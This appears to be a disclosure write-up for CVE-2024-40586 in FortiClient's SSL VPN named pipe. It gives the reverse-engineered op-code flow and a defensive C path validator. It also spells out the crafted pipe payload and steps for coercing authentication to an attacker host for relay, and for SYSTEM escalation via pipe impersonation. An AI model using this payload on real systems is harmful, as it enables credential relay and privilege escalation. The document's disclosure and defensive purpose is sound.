# CVE-2024-40586 Windows Coerced Authentication in FortiClient
On Windows, FortiClient (app version 7.0.8.0427) allows a remote unprivileged user to coerce the Windows host into authenticating to other machines via the named pipe served by the FortiSSLVPNdaemon service.
The named pipe "FortiSslvpnNamedPipe" grants READ and WRITE access to any user.

# Analysis
The app reads the 5th byte of the buffer received from the named pipe as the op code (`PipeBuffer+4`).

The app reads a file when the op code equals 24 (i.e., 0x18).
Code flow: `Case 24` => `LABEL_26` => `strncpy` copies the payload into the variable `Buffer` => the payload is passed to `sub_7FF60C3EAC20` => `CreateFileA` is called => `ReadFile`

However, the application does nothing with the file content.
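A hardened version of the op-code-24 path check, written here as an added example (not FortiClient's code), assuming the 6-byte header layout described above and a hypothetical allow-listed directory `ALLOWED_DIR`; the Windows-specific calls are left out so the validator is portable and testable.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Wire format seen on the pipe: 4 bytes, op code at offset 4, one more byte, then the path. */
#define OP_OFFSET      4
#define PAYLOAD_OFFSET 6
#define OP_READ_FILE   0x18
/* Hypothetical allow-listed directory; a real fix would use the service's own data directory. */
static const char ALLOWED_DIR[] = "C:\\ProgramData\\Fortinet\\FortiClient\\";

/* Case-insensitive prefix test (NTFS paths are case-insensitive); s must be NUL-terminated. */
static bool prefix_ieq(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix)) return false;
    return true;
}

/* Validate an op-code 0x18 request before its path reaches CreateFileA.
 * Copies the path into `out` and returns true only if it names a local file under ALLOWED_DIR;
 * everything else (UNC paths, \\.\pipe\ device paths, traversal, ADS) is rejected. */
bool safe_readfile_path(const unsigned char *buf, size_t len, char *out, size_t outlen)
{
    if (len <= PAYLOAD_OFFSET || buf[OP_OFFSET] != OP_READ_FILE) return false;
    const char *path = (const char *)buf + PAYLOAD_OFFSET;
    const char *nul  = memchr(path, '\0', len - PAYLOAD_OFFSET);
    if (nul == NULL) return false;                 /* unterminated input: reject instead of strncpy */
    size_t n = (size_t)(nul - path);
    if (n == 0 || n >= outlen) return false;
    /* A leading separator covers UNC (\\host\share), device (\\.\pipe\x) and \\?\ forms,
     * so only a drive-qualified path can pass the allow-list below. */
    if (path[0] == '\\' || path[0] == '/') return false;
    if (strchr(path, '/') || strstr(path, "..")) return false;   /* no forward slashes, no traversal */
    if (strchr(path + 2, ':')) return false;                     /* no alternate data streams */
    if (!prefix_ieq(path, ALLOWED_DIR)) return false;
    if (n <= strlen(ALLOWED_DIR)) return false;                  /* a file name must follow the directory */
    memcpy(out, path, n + 1);
    return true;
}
```

A complete fix also creates the pipe with a DACL that does not grant write access to unprivileged or remote users, so that the validator is a second layer rather than the only one.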
# Exploit
We can send crafted traffic (i.e., "\x00\x00\x00\x00\x18\x00" concatenated with a target path) to the vulnerable named pipe "FortiSslvpnNamedPipe" to trigger op code 24 and force the process "FortiSSLVPNdaemon.exe" to call `CreateFileA` with SYSTEM privileges. Therefore, we can force the service to open a remote file by submitting a UNC path (e.g., `\\<remote ip>\<file path>`) or to connect to a local named pipe (e.g., `\\127.0.0.1\pipe\<named pipe>`).
### Scenario 1
To coerce the Windows host into authenticating to another machine, a remote unauthenticated user can follow these steps:
1. On the attacker machine, start a listener to receive the coerced authentication.
2. On the attacker machine, send the crafted payload (i.e., "\x00\x00\x00\x00\x18\x00" + `\\<attacker IP>\fake\fake`) to the vulnerable named pipe of the victim machine, `\\<victim IP>\pipe\FortiSslvpnNamedPipe`, to force the process to open a remote file at the UNC path `\\<attacker IP>\fake\fake`.
3. As with other coerced authentication attacks (e.g., SpoolSample), the attacker can then perform a relay attack or an authentication downgrade attack.

### Scenario 2
To escalate privileges to SYSTEM from a local user holding "SeImpersonatePrivilege" (e.g., "nt authority\network service"), the user can follow these steps:
1. Create a named pipe server that waits for a connection.
2. Send the crafted payload (i.e., "\x00\x00\x00\x00\x18\x00" + `\\127.0.0.1\pipe\<pipe server>\XXX`) to the local vulnerable named pipe `\\.\pipe\FortiSslvpnNamedPipe` to force the process to connect to our named pipe server.
3. After the connection comes in, call `ImpersonateNamedPipeClient()` to impersonate the SYSTEM client.

# Timeline
- 07/09/2023 - Vulnerability reported to Fortinet
- 08/30/2023 - Fortinet confirmed vulnerability
- 02/11/2024 - Publication
# Reference
- https://fortiguard.fortinet.com/psirt/FG-IR-23-279